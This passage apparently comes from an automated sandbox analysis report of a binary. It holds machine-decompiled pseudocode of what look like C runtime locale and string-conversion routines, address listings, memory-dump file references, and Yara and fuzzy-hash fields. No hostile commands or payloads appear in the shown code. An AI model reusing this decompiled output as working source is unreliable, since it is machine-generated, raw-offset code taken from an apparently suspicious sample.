											if(_t110 <= 0) {
												L43:
												_t73 = _v24 + 2;
												_v24 = _t73;
												if(_t114 < _t93) {
													continue;
												}
												goto L56;
											}
											_t105 = _v28;
											while(1) {
												_t78 =  *((intOrPtr*)(_t117 + _t76 - 0xc));
												 *((char*)(_t105 + _t114)) = _t78;
												if(_t78 == 0) {
													goto L56;
												}
												_t76 = _v32 + 1;
												_t114 = _t114 + 1;
												_v32 = _t76;
												if(_t76 < _t110) {
													continue;
												}
												goto L43;
											}
											goto L56;
										}
										goto L55;
									}
								}
								if(_v20 != _t116) {
									goto L45;
								}
								_t28 = _t114 - 1; // -1
								_t116 = _t28;
								goto L51;
							}
							if(_t91 == 0) {
								L21:
								_t116 = WideCharToMultiByte( *(_t108 + 8), _t116, _t113, _t91, _t98, _t91, _t116,  &_v20);
								if(_t116 == 0 || _v20 != 0) {
									goto L45;
								} else {
									if(_v28[_t116 - 1] == 0) {
										_t116 = _t116 - 1;
									}
									goto L51;
								}
							}
							_t83 = _t113;
							_v24 = _t91;
							while( *_t83 != _t116) {
								_t83 =  &(_t83[1]);
								_t16 =  &_v24;
								 *_t16 = _v24 - 1;
								if( *_t16 != 0) {
									continue;
								}
								break;
							}
							if(_v24 != _t116 &&  *_t83 == _t116) {
								_t91 = (_t83 - _t113 >> 1) + 1;
							}
							goto L21;
						}
						if(_t91 == 0) {
							goto L51;
						}
						while( *_t113 <= 0xff) {
							_t98[_t116] =  *_t113;
							_t85 =  *_t113;
							_t113 =  &(_t113[1]);
							if(_t85 == 0) {
								goto L51;
							}
							_t116 = _t116 + 1;
							if(_t116 < _t91) {
								continue;
							}
							goto L51;
						}
						goto L45;
					}
					 *((intOrPtr*)(E00432914())) = 0x16;
					E00430C7A();
					goto L59;
				} else {
					L59:
					return E004294CB(_v8 ^ _t117);
				}
			}






































                                            0x00440a27
                                            0x00440a2f
                                            0x00440a36
                                            0x00440a39
                                            0x00440a3d
                                            0x00440a41
                                            0x00440a43
                                            0x00440a46
                                            0x00440a4a
                                            0x00440a4d
                                            0x00440a52
                                            0x00440a61
                                            0x00440a81
                                            0x00440a86
                                            0x00440a8b
                                            0x00440c28
                                            0x00440c31
                                            0x00440c63
                                            0x00440c6b
                                            0x00440c77
                                            0x00440c77
                                            0x00440c7c
                                            0x00440c7f
                                            0x00000000
                                            0x00440c72
                                            0x00440c72
                                            0x00440c72
                                            0x00440c85
                                            0x00440c89
                                            0x00440c8e
                                            0x00440c8e
                                            0x00000000
                                            0x00440c95
                                            0x00440c6b
                                            0x00440c33
                                            0x00440c39
                                            0x00440c51
                                            0x00440c51
                                            0x00000000
                                            0x00440c51
                                            0x00440c40
                                            0x00440c45
                                            0x00440c48
                                            0x00440c49
                                            0x00440c4f
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00440c4f
                                            0x00000000
                                            0x00440c40
                                            0x00440a91
                                            0x00440a9a
                                            0x00440ad4
                                            0x00440b4d
                                            0x00440b51
                                            0x00440b67
                                            0x00440c18
                                            0x00440c18
                                            0x00440c1d
                                            0x00440c20
                                            0x00000000
                                            0x00440b7c
                                            0x00440b7e
                                            0x00000000
                                            0x00000000
                                            0x00440b84
                                            0x00440b87
                                            0x00440b87
                                            0x00440b8a
                                            0x00440b90
                                            0x00440b94
                                            0x00440b94
                                            0x00440ba6
                                            0x00440bac
                                            0x00440baf
                                            0x00440bb3
                                            0x00000000
                                            0x00000000
                                            0x00440bd8
                                            0x00000000
                                            0x00000000
                                            0x00440bde
                                            0x00440be0
                                            0x00440be5
                                            0x00440c05
                                            0x00440c08
                                            0x00440c0b
                                            0x00440c10
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00440c16
                                            0x00440be7
                                            0x00440bea
                                            0x00440bea
                                            0x00440bee
                                            0x00440bf3
                                            0x00000000
                                            0x00000000
                                            0x00440bfc
                                            0x00440bfd
                                            0x00440bfe
                                            0x00440c03
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00440c03
                                            0x00000000
                                            0x00440bea
                                            0x00000000
                                            0x00440b87
                                            0x00440b67
                                            0x00440b56
                                            0x00000000
                                            0x00000000
                                            0x00440b5c
                                            0x00440b5c
                                            0x00000000
                                            0x00440b5c
                                            0x00440ad8
                                            0x00440afe
                                            0x00440b11
                                            0x00440b15
                                            0x00000000
                                            0x00440b25
                                            0x00440b2d
                                            0x00440b33
                                            0x00440b33
                                            0x00000000
                                            0x00440b2d
                                            0x00440b15
                                            0x00440ada
                                            0x00440adc
                                            0x00440adf
                                            0x00440ae4
                                            0x00440ae7
                                            0x00440ae7
                                            0x00440aeb
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00440aeb
                                            0x00440af0
                                            0x00440afd
                                            0x00440afd
                                            0x00000000
                                            0x00440af0
                                            0x00440a9e
                                            0x00000000
                                            0x00000000
                                            0x00440aa9
                                            0x00440ab4
                                            0x00440ab7
                                            0x00440aba
                                            0x00440ac0
                                            0x00000000
                                            0x00000000
                                            0x00440ac6
                                            0x00440ac9
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00440acb
                                            0x00000000
                                            0x00440aa9
                                            0x00440a68
                                            0x00440a6e
                                            0x00000000
                                            0x00440a58
                                            0x00440c97
                                            0x00440ca7
                                            0x00440ca7

                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: eef4e0f9939800557967537225eae6bc8a2fc50805348ee0cc8e4e33dfc51e56
                                            • Instruction ID: c0e68bc5acb1854c50774a8c8009d511e39fb42d01d6f542d9f110c0ddf1e4f9
                                            • Opcode Fuzzy Hash: eef4e0f9939800557967537225eae6bc8a2fc50805348ee0cc8e4e33dfc51e56
                                            • Instruction Fuzzy Hash: A971E23590021ADBEB28DF95C884ABFBB75EF55310F24032BEA1167240DBB49C51CBA9
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00435D23, Relevance: 7.7, APIs: 5, Instructions: 187COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 73%
                                            			E00435D23(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int _v56;
				char _v276;
				short _v278;
				short _v280;
				char _v448;
				signed int _v452;
				signed int _v456;
				short _v458;
				intOrPtr _v460;
				intOrPtr _v464;
				signed int _v468;
				signed int _v472;
				intOrPtr _v508;
				char _v536;
				signed int _v540;
				intOrPtr _v544;
				signed int _v556;
				char _v708;
				signed int _v712;
				signed int _v716;
				short _v718;
				signed int* _v720;
				signed int _v724;
				signed int _v728;
				signed int _v732;
				signed int* _v736;
				signed int _v740;
				signed int _v744;
				signed int _v748;
				signed int _v752;
				char _v820;
				char _v1248;
				char _v1256;
				intOrPtr _v1276;
				signed int _v1292;
				signed int _t241;
				void* _t244;
				signed int _t247;
				signed int _t249;
				signed int _t255;
				signed int _t256;
				signed int _t257;
				signed int _t258;
				signed int _t259;
				signed int _t261;
				signed int _t263;
				void* _t265;
				signed int _t266;
				signed int _t267;
				signed int _t268;
				signed int _t270;
				signed int _t273;
				signed int _t280;
				signed int _t281;
				signed int _t282;
				intOrPtr _t283;
				signed int _t286;
				signed int _t290;
				signed int _t291;
				intOrPtr _t293;
				signed int _t296;
				signed int _t297;
				signed int _t299;
				signed int _t319;
				signed int _t320;
				signed int _t323;
				signed int _t328;
				void* _t330;
				signed int _t332;
				void* _t333;
				intOrPtr _t334;
				signed int _t339;
				signed int _t340;
				intOrPtr* _t343;
				signed int _t357;
				signed int _t359;
				signed int _t361;
				intOrPtr* _t362;
				signed int _t364;
				signed int _t370;
				intOrPtr* _t374;
				intOrPtr* _t377;
				void* _t380;
				intOrPtr* _t381;
				intOrPtr* _t382;
				signed int _t393;
				signed int _t396;
				intOrPtr* _t397;
				signed int _t399;
				signed int* _t403;
				intOrPtr* _t410;
				intOrPtr* _t411;
				signed int _t421;
				short _t422;
				void* _t424;
				signed int _t425;
				signed int _t427;
				intOrPtr _t428;
				signed int _t431;
				intOrPtr _t432;
				signed int _t434;
				signed int _t437;
				intOrPtr _t443;
				signed int _t444;
				signed int _t446;
				signed int _t447;
				signed int _t450;
				signed int _t452;
				signed int _t456;
				signed int* _t457;
				intOrPtr* _t458;
				short _t459;
				void* _t461;
				signed int _t463;
				signed int _t465;
				void* _t467;
				void* _t468;
				void* _t470;
				signed int _t471;
				void* _t472;
				void* _t474;
				signed int _t475;
				void* _t477;
				void* _t479;
				intOrPtr _t491;

				_t420 = __edx;
				_t461 = _t467;
				_t468 = _t467 - 0xc;
				_push(__ebx);
				_push(__esi);
				_v12 = 1;
				_t357 = E00436F33(__ecx, 0x6a6);
				_t240 = 0;
				_pop(_t370);
				if(_t357 == 0) {
					L20:
					return _t240;
				} else {
					_push(__edi);
					_t2 = _t357 + 4; // 0x4
					_t427 = _t2;
					 *_t427 = 0;
					 *_t357 = 1;
					_t443 = _a4;
					_t4 = _t443 + 0x30; // 0x435522
					_t241 = _t4;
					_push( *_t241);
					_v16 = _t241;
					_push(0x44d3c0);
					_push( *0x44d27c);
					E00435C62(_t357, _t370, __edx, _t427, _t443, _t427, 0x351, 3);
					_t470 = _t468 + 0x18;
					_v8 = 0x44d27c;
					while(1) {
						L2:
						_t244 = E0043D9F7(_t427, 0x351, ";");
						_t471 = _t470 + 0xc;
						if(_t244 != 0) {
							break;
						} else {
							_t8 = _v16 + 0x10; // 0x10
							_t410 = _t8;
							_t339 =  *_v16;
							_v16 = _t410;
							_t411 =  *_t410;
							goto L4;
						}
						while(1) {
							L4:
							_t420 =  *_t339;
							if(_t420 !=  *_t411) {
								break;
							}
							if(_t420 == 0) {
								L8:
								_t340 = 0;
							} else {
								_t420 =  *((intOrPtr*)(_t339 + 2));
								if(_t420 !=  *((intOrPtr*)(_t411 + 2))) {
									break;
								} else {
									_t339 = _t339 + 4;
									_t411 = _t411 + 4;
									if(_t420 != 0) {
										continue;
									} else {
										goto L8;
									}
								}
							}
							L10:
							asm("sbb eax, eax");
							_t370 = _v8 + 0xc;
							_v8 = _t370;
							_v12 = _v12 &  !( ~_t340);
							_t343 = _v16;
							_v16 = _t343;
							_push( *_t343);
							_push(0x44d3c0);
							_push( *_t370);
							E00435C62(_t357, _t370, _t420, _t427, _t443, _t427, 0x351, 3);
							_t470 = _t471 + 0x18;
							if(_v8 < 0x44d2ac) {
								goto L2;
							} else {
								if(_v12 != 0) {
									E00437795(_t357);
									_t31 = _t443 + 0x28; // 0x30ff068b
									_t434 = _t427 | 0xffffffff;
									__eflags =  *_t31;
									if(__eflags != 0) {
										asm("lock xadd [ecx], eax");
										if(__eflags == 0) {
											_t32 = _t443 + 0x28; // 0x30ff068b
											E00437795( *_t32);
										}
									}
									_t33 = _t443 + 0x24; // 0x30ff0c46
									__eflags =  *_t33;
									if( *_t33 != 0) {
										asm("lock xadd [eax], edi");
										__eflags = _t434 == 1;
										if(_t434 == 1) {
											_t34 = _t443 + 0x24; // 0x30ff0c46
											E00437795( *_t34);
										}
									}
									 *(_t443 + 0x24) = 0;
									 *(_t443 + 0x1c) = 0;
									 *(_t443 + 0x28) = 0;
									 *((intOrPtr*)(_t443 + 0x20)) = 0;
									_t39 = _t443 + 0x40; // 0x10468b00
									_t240 =  *_t39;
								} else {
									_t20 = _t443 + 0x28; // 0x30ff068b
									_t437 = _t427 | 0xffffffff;
									_t491 =  *_t20;
									if(_t491 != 0) {
										asm("lock xadd [ecx], eax");
										if(_t491 == 0) {
											_t21 = _t443 + 0x28; // 0x30ff068b
											E00437795( *_t21);
										}
									}
									_t22 = _t443 + 0x24; // 0x30ff0c46
									if( *_t22 != 0) {
										asm("lock xadd [eax], edi");
										if(_t437 == 1) {
											_t23 = _t443 + 0x24; // 0x30ff0c46
											E00437795( *_t23);
										}
									}
									 *(_t443 + 0x24) =  *(_t443 + 0x24) & 0x00000000;
									_t26 = _t357 + 4; // 0x4
									_t240 = _t26;
									 *(_t443 + 0x1c) =  *(_t443 + 0x1c) & 0x00000000;
									 *(_t443 + 0x28) = _t357;
									 *((intOrPtr*)(_t443 + 0x20)) = _t240;
								}
								goto L20;
							}
							goto L130;
						}
						asm("sbb eax, eax");
						_t340 = _t339 | 0x00000001;
						__eflags = _t340;
						goto L10;
					}
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E00430CA7();
					asm("int3");
					_push(_t461);
					_t463 = _t471;
					_t472 = _t471 - 0x1d0;
					_t247 =  *0x45f014; // 0x8d941b67
					_v56 = _t247 ^ _t463;
					_t249 = _v40;
					_push(_t357);
					_push(_t443);
					_t444 = _v36;
					_push(_t427);
					_t428 = _v44;
					_v508 = _t428;
					__eflags = _t249;
					if(_t249 == 0) {
						_v456 = 1;
						_v468 = 0;
						_t359 = 0;
						_v452 = 0;
						__eflags = _t444;
						if(__eflags == 0) {
							L79:
							E00435D23(_t359, _t370, _t420, _t428, _t444, __eflags, _t428);
							goto L80;
						} else {
							__eflags =  *_t444 - 0x4c;
							if( *_t444 != 0x4c) {
								L58:
								_push(0);
								_t255 = E004358EB(_t359, _t420, _t428, _t444, _t444,  &_v276, 0x83,  &_v448, 0x55);
								_t474 = _t472 + 0x18;
								__eflags = _t255;
								if(_t255 != 0) {
									_t370 = 0;
									__eflags = 0;
									_t76 = _t428 + 0x20; // 0x435512
									_t421 = _t76;
									_t446 = 0;
									_v452 = _t421;
									do {
										__eflags = _t446;
										if(_t446 == 0) {
											L73:
											_t256 = _v456;
										} else {
											_t374 =  *_t421;
											_t257 =  &_v276;
											while(1) {
												__eflags =  *_t257 -  *_t374;
												_t428 = _v464;
												if( *_t257 !=  *_t374) {
													break;
												}
												__eflags =  *_t257;
												if( *_t257 == 0) {
													L66:
													_t370 = 0;
													_t258 = 0;
												} else {
													_t422 =  *((intOrPtr*)(_t257 + 2));
													__eflags = _t422 -  *((intOrPtr*)(_t374 + 2));
													_v458 = _t422;
													_t421 = _v452;
													if(_t422 !=  *((intOrPtr*)(_t374 + 2))) {
														break;
													} else {
														_t257 = _t257 + 4;
														_t374 = _t374 + 4;
														__eflags = _v458;
														if(_v458 != 0) {
															continue;
														} else {
															goto L66;
														}
													}
												}
												L68:
												__eflags = _t258;
												if(_t258 == 0) {
													_t359 = _t359 + 1;
													__eflags = _t359;
													goto L73;
												} else {
													_t259 =  &_v276;
													_push(_t259);
													_push(_t446);
													_push(_t428);
													L83();
													_t421 = _v452;
													_t474 = _t474 + 0xc;
													__eflags = _t259;
													if(_t259 == 0) {
														_t370 = 0;
														_t256 = 0;
														_v456 = 0;
													} else {
														_t359 = _t359 + 1;
														_t370 = 0;
														goto L73;
													}
												}
												goto L74;
											}
											asm("sbb eax, eax");
											_t258 = _t257 | 0x00000001;
											_t370 = 0;
											__eflags = 0;
											goto L68;
										}
										L74:
										_t446 = _t446 + 1;
										_t421 = _t421 + 0x10;
										_v452 = _t421;
										__eflags = _t446 - 5;
									} while (_t446 <= 5);
									__eflags = _t256;
									if(__eflags != 0) {
										goto L79;
									} else {
										__eflags = _t359;
										goto L77;
									}
								}
								goto L80;
							} else {
								__eflags =  *(_t444 + 2) - 0x43;
								if( *(_t444 + 2) != 0x43) {
									goto L58;
								} else {
									__eflags =  *((short*)(_t444 + 4)) - 0x5f;
									if( *((short*)(_t444 + 4)) != 0x5f) {
										goto L58;
									} else {
										while(1) {
											_t261 = E0043EB57(_t444, 0x44d3b8);
											_t361 = _t261;
											_v472 = _t361;
											_pop(_t376);
											__eflags = _t361;
											if(_t361 == 0) {
												break;
											}
											_t263 = _t261 - _t444;
											__eflags = _t263;
											_v456 = _t263 >> 1;
											if(_t263 == 0) {
												break;
											} else {
												_t265 = 0x3b;
												__eflags =  *_t361 - _t265;
												if( *_t361 == _t265) {
													break;
												} else {
													_t431 = _v456;
													_t362 = 0x44d27c;
													_v460 = 1;
													do {
														_t266 = E0043EB1D( *_t362, _t444, _t431);
														_t472 = _t472 + 0xc;
														__eflags = _t266;
														if(_t266 != 0) {
															goto L45;
														} else {
															_t377 =  *_t362;
															_t420 = _t377 + 2;
															do {
																_t334 =  *_t377;
																_t377 = _t377 + 2;
																__eflags = _t334 - _v468;
															} while (_t334 != _v468);
															_t376 = _t377 - _t420 >> 1;
															__eflags = _t431 - _t377 - _t420 >> 1;
															if(_t431 != _t377 - _t420 >> 1) {
																goto L45;
															}
														}
														break;
														L45:
														_v460 = _v460 + 1;
														_t362 = _t362 + 0xc;
														__eflags = _t362 - 0x44d2ac;
													} while (_t362 <= 0x44d2ac);
													_t359 = _v472 + 2;
													_t267 = E0043EACD(_t376, _t359, ";");
													_t428 = _v464;
													_t447 = _t267;
													_pop(_t380);
													__eflags = _t447;
													if(_t447 != 0) {
														L48:
														__eflags = _v460 - 5;
														if(_v460 > 5) {
															_t268 = _v452;
															goto L54;
														} else {
															_push(_t447);
															_t270 = E0043DB39(_t380,  &_v276, 0x83, _t359);
															_t475 = _t472 + 0x10;
															__eflags = _t270;
															if(_t270 != 0) {
																L82:
																_push(0);
																_push(0);
																_push(0);
																_push(0);
																_push(0);
																E00430CA7();
																asm("int3");
																_push(_t463);
																_t465 = _t475;
																_t273 =  *0x45f014; // 0x8d941b67
																_v556 = _t273 ^ _t465;
																_push(_t359);
																_t364 = _v540;
																_push(_t447);
																_push(_t428);
																_t432 = _v544;
																_v1292 = _t364;
																_v1276 = E00438D61(_t364, _t380, _t420) + 0x278;
																_push( &_v1256);
																_t280 = E004358EB(_t364, _t420, _t432, _v536, _v536,  &_v820, 0x83,  &_v1248, 0x55);
																_t477 = _t475 - 0x2e4 + 0x18;
																__eflags = _t280;
																if(_t280 != 0) {
																	_t101 = _t364 + 2; // 0x6
																	_t450 = _t101 << 4;
																	__eflags = _t450;
																	_t281 =  &_v280;
																	_v724 = _t450;
																	_t381 =  *((intOrPtr*)(_t450 + _t432));
																	while(1) {
																		_v712 = _v712 & 0x00000000;
																		__eflags =  *_t281 -  *_t381;
																		_t452 = _v724;
																		if( *_t281 !=  *_t381) {
																			break;
																		}
																		__eflags =  *_t281;
																		if( *_t281 == 0) {
																			L91:
																			_t282 = _v712;
																		} else {
																			_t459 =  *((intOrPtr*)(_t281 + 2));
																			__eflags = _t459 -  *((intOrPtr*)(_t381 + 2));
																			_v718 = _t459;
																			_t452 = _v724;
																			if(_t459 !=  *((intOrPtr*)(_t381 + 2))) {
																				break;
																			} else {
																				_t281 = _t281 + 4;
																				_t381 = _t381 + 4;
																				__eflags = _v718;
																				if(_v718 != 0) {
																					continue;
																				} else {
																					goto L91;
																				}
																			}
																		}
																		L93:
																		__eflags = _t282;
																		if(_t282 != 0) {
																			_t382 =  &_v280;
																			_t424 = _t382 + 2;
																			do {
																				_t283 =  *_t382;
																				_t382 = _t382 + 2;
																				__eflags = _t283 - _v712;
																			} while (_t283 != _v712);
																			_v728 = (_t382 - _t424 >> 1) + 1;
																			_t286 = E00436F33(_t382 - _t424 >> 1, 4 + ((_t382 - _t424 >> 1) + 1) * 2);
																			_v740 = _t286;
																			__eflags = _t286;
																			if(_t286 == 0) {
																				goto L84;
																			} else {
																				_v732 =  *((intOrPtr*)(_t452 + _t432));
																				_t125 = _t364 * 4; // 0x996c
																				_v744 =  *((intOrPtr*)(_t432 + _t125 + 0xa0));
																				_t128 = _t432 + 8; // 0x8b56ff8b
																				_v748 =  *_t128;
																				_t391 =  &_v280;
																				_v720 = _t286 + 4;
																				_t290 = E00437840(_t286 + 4, _v728,  &_v280);
																				_t479 = _t477 + 0xc;
																				__eflags = _t290;
																				if(_t290 != 0) {
																					_t291 = _v712;
																					_push(_t291);
																					_push(_t291);
																					_push(_t291);
																					_push(_t291);
																					_push(_t291);
																					E00430CA7();
																					asm("int3");
																					_t293 =  *0x4604f8; // 0x0
																					return _t293;
																				} else {
																					__eflags = _v280 - 0x43;
																					 *((intOrPtr*)(_t452 + _t432)) = _v720;
																					if(_v280 != 0x43) {
																						L102:
																						_t296 = E004355F8(_t364, _t391, _t432,  &_v708);
																						_t393 = _v712;
																						 *(_t432 + 0xa0 + _t364 * 4) = _t296;
																					} else {
																						__eflags = _v278;
																						if(_v278 != 0) {
																							goto L102;
																						} else {
																							_t393 = _v712;
																							 *(_t432 + 0xa0 + _t364 * 4) = _t393;
																						}
																					}
																					__eflags = _t364 - 2;
																					if(_t364 != 2) {
																						__eflags = _t364 - 1;
																						if(_t364 != 1) {
																							__eflags = _t364 - 5;
																							if(_t364 == 5) {
																								 *((intOrPtr*)(_t432 + 0x14)) = _v716;
																							}
																						} else {
																							 *((intOrPtr*)(_t432 + 0x10)) = _v716;
																						}
																					} else {
																						_t457 = _v736;
																						_t425 = _t393;
																						_t403 = _t457;
																						 *(_t432 + 8) = _v716;
																						_v720 = _t457;
																						_v728 = _t457[8];
																						_v716 = _t457[9];
																						while(1) {
																							_t154 = _t432 + 8; // 0x8b56ff8b
																							__eflags =  *_t154 -  *_t403;
																							if( *_t154 ==  *_t403) {
																								break;
																							}
																							_t458 = _v720;
																							_t425 = _t425 + 1;
																							_t328 =  *_t403;
																							 *_t458 = _v728;
																							_v716 = _t403[1];
																							_t403 = _t458 + 8;
																							 *((intOrPtr*)(_t458 + 4)) = _v716;
																							_t364 = _v752;
																							_t457 = _v736;
																							_v728 = _t328;
																							_v720 = _t403;
																							__eflags = _t425 - 5;
																							if(_t425 < 5) {
																								continue;
																							} else {
																							}
																							L110:
																							__eflags = _t425 - 5;
																							if(__eflags == 0) {
																								_t178 = _t432 + 8; // 0x8b56ff8b
																								_t319 = E0043EB9C(_t364, _t425, _t432, _t457, __eflags, _v712, 1, 0x44d338, 0x7f,  &_v536,  *_t178, 1);
																								_t479 = _t479 + 0x1c;
																								__eflags = _t319;
																								_t320 = _v712;
																								if(_t319 == 0) {
																									_t457[1] = _t320;
																								} else {
																									do {
																										 *(_t465 + _t320 * 2 - 0x20c) =  *(_t465 + _t320 * 2 - 0x20c) & 0x000001ff;
																										_t320 = _t320 + 1;
																										__eflags = _t320 - 0x7f;
																									} while (_t320 < 0x7f);
																									_t323 = E0042CF8E( &_v536,  *0x45f170, 0xfe);
																									_t479 = _t479 + 0xc;
																									__eflags = _t323;
																									_t457[1] = 0 | _t323 == 0x00000000;
																								}
																								_t193 = _t432 + 8; // 0x8b56ff8b
																								 *_t457 =  *_t193;
																							}
																							 *(_t432 + 0x18) = _t457[1];
																							goto L121;
																						}
																						__eflags = _t425;
																						if(_t425 != 0) {
																							 *_t457 =  *(_t457 + _t425 * 8);
																							_t457[1] =  *(_t457 + 4 + _t425 * 8);
																							 *(_t457 + _t425 * 8) = _v728;
																							 *(_t457 + 4 + _t425 * 8) = _v716;
																						}
																						goto L110;
																					}
																					L121:
																					_t297 = _t364 * 0xc;
																					_t200 = _t297 + 0x44d278; // 0x40a45c
																					 *0x4493d4(_t432);
																					_t299 =  *((intOrPtr*)( *_t200))();
																					_t396 = _v732;
																					__eflags = _t299;
																					if(_t299 == 0) {
																						__eflags = _t396 - 0x45f2d8;
																						if(_t396 != 0x45f2d8) {
																							_t456 = _t364 + _t364;
																							__eflags = _t456;
																							asm("lock xadd [eax], ecx");
																							if(_t456 != 0) {
																								goto L126;
																							} else {
																								_t218 = _t456 * 8; // 0x30ff068b
																								E00437795( *((intOrPtr*)(_t432 + _t218 + 0x28)));
																								_t221 = _t456 * 8; // 0x30ff0c46
																								E00437795( *((intOrPtr*)(_t432 + _t221 + 0x24)));
																								_t224 = _t364 * 4; // 0x996c
																								E00437795( *((intOrPtr*)(_t432 + _t224 + 0xa0)));
																								_t399 = _v712;
																								 *((intOrPtr*)(_v724 + _t432)) = _t399;
																								 *(_t432 + 0xa0 + _t364 * 4) = _t399;
																							}
																						}
																						_t397 = _v740;
																						 *_t397 = 1;
																						 *((intOrPtr*)(_t432 + 0x28 + (_t364 + _t364) * 8)) = _t397;
																					} else {
																						 *(_v724 + _t432) = _t396;
																						_t205 = _t364 * 4; // 0x996c
																						E00437795( *((intOrPtr*)(_t432 + _t205 + 0xa0)));
																						 *(_t432 + 0xa0 + _t364 * 4) = _v744;
																						E00437795(_v740);
																						 *(_t432 + 8) = _v748;
																						goto L84;
																					}
																					goto L85;
																				}
																			}
																		} else {
																			goto L85;
																		}
																		goto L130;
																	}
																	asm("sbb eax, eax");
																	_t282 = _t281 | 0x00000001;
																	__eflags = _t282;
																	goto L93;
																} else {
																	L84:
																	__eflags = 0;
																	L85:
																	__eflags = _v16 ^ _t465;
																	return E004294CB(_v16 ^ _t465);
																}
															} else {
																_t330 = _t447 + _t447;
																__eflags = _t330 - 0x106;
																if(_t330 >= 0x106) {
																	E004295FF();
																	goto L82;
																} else {
																	 *((short*)(_t463 + _t330 - 0x10c)) = 0;
																	_t332 =  &_v276;
																	_push(_t332);
																	_push(_v460);
																	_push(_t428);
																	L83();
																	_t472 = _t475 + 0xc;
																	__eflags = _t332;
																	_t268 = _v452;
																	if(_t332 != 0) {
																		_t268 = _t268 + 1;
																		_v452 = _t268;
																	}
																	L54:
																	_t444 = _t359 + _t447 * 2;
																	_t370 = 0;
																	__eflags =  *_t444;
																	if( *_t444 == 0) {
																		L56:
																		__eflags = _t268;
																		L77:
																		if(__eflags != 0) {
																			goto L79;
																		} else {
																		}
																		goto L80;
																	} else {
																		_t444 = _t444 + 2;
																		__eflags =  *_t444;
																		if( *_t444 != 0) {
																			continue;
																		} else {
																			goto L56;
																		}
																	}
																}
															}
														}
													} else {
														_t333 = 0x3b;
														__eflags =  *_t359 - _t333;
														if( *_t359 != _t333) {
															break;
														} else {
															goto L48;
														}
													}
												}
											}
											goto L130;
										}
										goto L80;
									}
								}
							}
						}
					} else {
						__eflags = _t444;
						if(_t444 != 0) {
							_push(_t444);
							_push(_t249);
							_push(_t428);
							L83();
						}
						L80:
						__eflags = _v12 ^ _t463;
						return E004294CB(_v12 ^ _t463);
					}
				}
				L130:
			}






































































































































                                            0x00435d23
                                            0x00435d26
                                            0x00435d28
                                            0x00435d2b
                                            0x00435d2c
                                            0x00435d35
                                            0x00435d3d
                                            0x00435d3f
                                            0x00435d41
                                            0x00435d44
                                            0x00435e5d
                                            0x00435e62
                                            0x00435d4a
                                            0x00435d4a
                                            0x00435d4b
                                            0x00435d4b
                                            0x00435d4e
                                            0x00435d51
                                            0x00435d53
                                            0x00435d56
                                            0x00435d56
                                            0x00435d59
                                            0x00435d5b
                                            0x00435d5e
                                            0x00435d63
                                            0x00435d71
                                            0x00435d7b
                                            0x00435d7e
                                            0x00435d81
                                            0x00435d81
                                            0x00435d8c
                                            0x00435d91
                                            0x00435d96
                                            0x00000000
                                            0x00435d9c
                                            0x00435d9f
                                            0x00435d9f
                                            0x00435da2
                                            0x00435da4
                                            0x00435da7
                                            0x00435da7
                                            0x00435da7
                                            0x00435da9
                                            0x00435da9
                                            0x00435da9
                                            0x00435daf
                                            0x00000000
                                            0x00000000
                                            0x00435db4
                                            0x00435dcb
                                            0x00435dcb
                                            0x00435db6
                                            0x00435db6
                                            0x00435dbe
                                            0x00000000
                                            0x00435dc0
                                            0x00435dc0
                                            0x00435dc3
                                            0x00435dc9
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00435dc9
                                            0x00435dbe
                                            0x00435dd4
                                            0x00435dd9
                                            0x00435ddb
                                            0x00435de0
                                            0x00435de3
                                            0x00435de6
                                            0x00435de9
                                            0x00435dec
                                            0x00435dee
                                            0x00435df3
                                            0x00435dfd
                                            0x00435e05
                                            0x00435e0d
                                            0x00000000
                                            0x00435e13
                                            0x00435e17
                                            0x00435e64
                                            0x00435e6a
                                            0x00435e6d
                                            0x00435e70
                                            0x00435e72
                                            0x00435e76
                                            0x00435e7a
                                            0x00435e7c
                                            0x00435e7f
                                            0x00435e84
                                            0x00435e7a
                                            0x00435e85
                                            0x00435e88
                                            0x00435e8a
                                            0x00435e8c
                                            0x00435e90
                                            0x00435e91
                                            0x00435e93
                                            0x00435e96
                                            0x00435e9b
                                            0x00435e91
                                            0x00435e9e
                                            0x00435ea1
                                            0x00435ea4
                                            0x00435ea7
                                            0x00435eaa
                                            0x00435eaa
                                            0x00435e19
                                            0x00435e19
                                            0x00435e1c
                                            0x00435e1f
                                            0x00435e21
                                            0x00435e25
                                            0x00435e29
                                            0x00435e2b
                                            0x00435e2e
                                            0x00435e33
                                            0x00435e29
                                            0x00435e34
                                            0x00435e39
                                            0x00435e3b
                                            0x00435e40
                                            0x00435e42
                                            0x00435e45
                                            0x00435e4a
                                            0x00435e40
                                            0x00435e4b
                                            0x00435e4f
                                            0x00435e4f
                                            0x00435e52
                                            0x00435e56
                                            0x00435e59
                                            0x00435e59
                                            0x00000000
                                            0x00435e5c
                                            0x00000000
                                            0x00435e0d
                                            0x00435dcf
                                            0x00435dd1
                                            0x00435dd1
                                            0x00000000
                                            0x00435dd1
                                            0x00435eb1
                                            0x00435eb2
                                            0x00435eb3
                                            0x00435eb4
                                            0x00435eb5
                                            0x00435eb6
                                            0x00435ebb
                                            0x00435ebe
                                            0x00435ebf
                                            0x00435ec1
                                            0x00435ec7
                                            0x00435ece
                                            0x00435ed1
                                            0x00435ed4
                                            0x00435ed5
                                            0x00435ed6
                                            0x00435ed9
